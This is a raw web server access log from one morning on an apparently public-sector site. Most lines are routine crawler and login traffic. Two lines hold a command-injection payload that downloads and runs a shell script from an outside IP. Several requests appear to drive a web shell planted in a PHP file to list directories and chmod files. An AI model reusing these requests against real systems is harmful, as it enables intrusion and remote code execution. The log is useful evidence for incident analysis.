52.167.144.226 - - [03/Apr/2024:06:39:11 -0500] "GET / HTTP/1.1" 200 4720
20.110.58.60 - - [03/Apr/2024:06:39:11 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.41 - - [03/Apr/2024:06:39:12 -0500] "GET /favicon.ico HTTP/1.1" 404 1034
201.245.192.253 - - [03/Apr/2024:06:39:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38940
201.245.192.253 - - [03/Apr/2024:06:40:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39865
201.245.192.253 - - [03/Apr/2024:06:40:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [03/Apr/2024:06:38:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:06:40:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [03/Apr/2024:06:40:56 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [03/Apr/2024:06:39:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/consultarSolicitudAnulacion.xhtml HTTP/1.1" 302 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12405
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [03/Apr/2024:06:41:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12405
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:41:59 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2220
201.245.192.253 - - [03/Apr/2024:06:41:59 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16477
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [03/Apr/2024:06:42:01 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
172.22.2.4 - - [03/Apr/2024:06:41:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [03/Apr/2024:06:42:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:06:42:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:42:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:36 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
201.245.192.253 - - [03/Apr/2024:06:42:37 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64832
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2024:06:42:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
172.22.2.4 - - [03/Apr/2024:06:40:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
201.245.192.253 - - [03/Apr/2024:06:42:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13705
201.245.192.253 - - [03/Apr/2024:06:42:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:42:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 37300
201.245.192.253 - - [03/Apr/2024:06:42:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 37300
201.245.192.253 - - [03/Apr/2024:06:42:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13739
201.245.192.253 - - [03/Apr/2024:06:43:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 37300
201.245.192.253 - - [03/Apr/2024:06:43:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 37296
201.245.192.253 - - [03/Apr/2024:06:43:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13741
201.245.192.253 - - [03/Apr/2024:06:43:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.167 - - [03/Apr/2024:06:44:02 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
66.249.66.165 - - [03/Apr/2024:06:44:03 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
47.128.127.221 - - [03/Apr/2024:06:44:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Cmysql%5Cshare HTTP/1.1" 200 2746
201.245.192.253 - - [03/Apr/2024:06:44:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:44:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.25.130 - - [03/Apr/2024:06:44:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs HTTP/1.1" 200 2799
47.128.25.130 - - [03/Apr/2024:06:44:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=d&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs HTTP/1.1" 200 2799
172.22.2.4 - - [03/Apr/2024:06:45:07 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
172.22.2.4 - - [03/Apr/2024:06:45:10 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4883
172.22.2.4 - - [03/Apr/2024:06:45:12 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
47.128.56.128 - - [03/Apr/2024:06:45:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora&f=calculadora.php HTTP/1.1" 200 2860
172.22.2.4 - - [03/Apr/2024:06:45:14 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5667
172.22.2.4 - - [03/Apr/2024:06:45:16 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7588
172.22.2.4 - - [03/Apr/2024:06:45:18 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
66.249.66.20 - - [03/Apr/2024:06:45:18 -0500] "GET /BLA/resoluciones/AUTOS%202013/3571.pdf HTTP/1.1" 200 395773
172.22.2.4 - - [03/Apr/2024:06:45:20 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
66.249.66.20 - - [03/Apr/2024:06:45:31 -0500] "GET /Publicaciones/2024EE67453.pdf HTTP/1.1" 200 223261
47.128.56.218 - - [03/Apr/2024:06:45:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CAutoliquidacion2020%5CAceites-Residuos-Estaciones-&f=Registro+aceite+vegetal+usado HTTP/1.1" 200 2920
157.55.39.222 - - [03/Apr/2024:06:46:09 -0500] "GET /robots.txt HTTP/1.1" 404 1049
40.77.167.36 - - [03/Apr/2024:06:46:13 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%207%20del%201%20de%20Agosto%20de%202013.pdf HTTP/1.1" 200 340934
172.22.2.4 - - [03/Apr/2024:06:44:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:06:46:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:46:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [03/Apr/2024:06:45:22 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48027
216.245.221.92 - - [03/Apr/2024:06:47:12 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2024:06:45:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
66.249.66.19 - - [03/Apr/2024:06:47:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/2430.pdf HTTP/1.1" 200 737417
201.245.192.253 - - [03/Apr/2024:06:48:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [03/Apr/2024:06:48:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:48:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:50:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:50:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [03/Apr/2024:06:52:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2024:06:50:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:06:52:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:52:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [03/Apr/2024:06:52:50 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [03/Apr/2024:06:52:50 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [03/Apr/2024:06:51:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [03/Apr/2024:06:53:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.13 - - [03/Apr/2024:06:53:31 -0500] "GET /BLA/resoluciones/AUTOS%202022/2139.pdf HTTP/1.1" 304 -
66.249.66.167 - - [03/Apr/2024:06:54:08 -0500] "GET /portaldeninos/wp-admin/admin-ajax.php HTTP/1.1" 400 1
181.53.12.242 - - [03/Apr/2024:06:54:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
181.53.12.242 - - [03/Apr/2024:06:54:27 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
181.53.12.242 - - [03/Apr/2024:06:54:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
181.53.12.242 - - [03/Apr/2024:06:54:27 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 1099
201.245.192.253 - - [03/Apr/2024:06:54:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
181.53.12.242 - - [03/Apr/2024:06:54:43 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.53.12.242 - - [03/Apr/2024:06:54:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12405
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:54:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
181.53.12.242 - - [03/Apr/2024:06:54:45 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.53.12.242 - - [03/Apr/2024:06:54:45 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [03/Apr/2024:06:54:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.20 - - [03/Apr/2024:06:55:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2584.pdf HTTP/1.1" 200 281525
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16286
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:15 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
181.53.12.242 - - [03/Apr/2024:06:55:15 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
181.53.12.242 - - [03/Apr/2024:06:55:15 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:15 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.242 - - [03/Apr/2024:06:55:15 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
181.53.12.242 - - [03/Apr/2024:06:55:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
181.53.12.242 - - [03/Apr/2024:06:55:17 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 61397
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
181.53.12.242 - - [03/Apr/2024:06:55:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 19592
181.53.12.242 - - [03/Apr/2024:06:55:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 139025
181.53.12.242 - - [03/Apr/2024:06:55:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.242 - - [03/Apr/2024:06:55:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.19 - - [03/Apr/2024:06:55:29 -0500] "GET /BLA/resoluciones/AUTOS%202014/1882.pdf HTTP/1.1" 200 526619
201.245.192.253 - - [03/Apr/2024:06:56:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:56:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [03/Apr/2024:06:57:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2024:06:56:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:06:58:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [03/Apr/2024:06:58:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:06:58:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [03/Apr/2024:06:57:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
